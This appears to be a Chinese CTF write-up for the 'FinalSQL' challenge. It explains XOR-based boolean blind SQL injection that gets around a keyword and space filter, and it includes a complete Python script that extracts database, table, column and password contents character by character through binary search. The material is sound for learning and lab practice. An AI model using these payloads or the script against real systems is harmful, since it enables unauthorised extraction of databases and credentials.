zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]FinalSQL

    考点

    SQL盲注
    bypass空格

    题解

    题目提示SQL盲注,过滤了很多关键词

    if mid like limit union and | & *  /**/ 空格
    

    输入 id=1^0 返回正确
    语句如下:
    0^(ascii(substr((select(database())),1,1))>102)
    ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>mid
    若SQL语句为真则返回正常,为假则返回ERROR

    select(group_concat(schema_name))from(information_schema.schemata)

    二分法

    假设第一个字符的ASCII码为96
    
    low  high  mid
    32   126   81
    返回正常则为真,第一个字符的ASCII码大于81
    82   126   104
    返回ERROR则为假,第一个字符的ASCII码小于等于104
    82   104   93
    返回正常则为真,第一个字符的ASCII码大于93
    94   104   99
    返回ERROR则为假,第一个字符的ASCII码小于等于99
    94   99    96
    返回ERROR则为假,第一个字符的ASCII码小于等于96
    94   96    95
    返回正常则为真,第一个字符的ASCII码大于95
    96   96
    

    脚本如下

    import requests
    
    url = 'http://5d9d1cb2-97fb-46b6-87e2-0fd16174256b.node3.buuoj.cn/search.php?id=' 
    
    # geek
    def get_database():
        flag = ''
        for i in range(1, 50):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(database())),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    # F1naI1y,Flaaaaag
    def get_table():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    # F1naI1y: id,username,password
    # Flaaaaag: id,fl4gawsl
    def get_column():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    def get_flag():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                # payload = f"0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{i},1))>{mid})"
                # payload = f"0^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})"
                payload = f"0^(ascii(substr(reverse((select(group_concat(password))from(F1naI1y))),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    get_flag()
    
  • 相关阅读:
    【转载】Spring各jar包详解
    Docker attach卡着的解决
    三张图搞透第一范式(1NF)、第二范式(2NF)和第三范式(3NF)的区别
    决策表
    因果图与决策表法
    边界值分析法
    黑盒测试方法
    软件测试的基本流程
    软件测试原则
    软件测试与软件开发
  • 原文地址:https://www.cnblogs.com/peri0d/p/14077310.html
Copyright © 2011-2022 走看看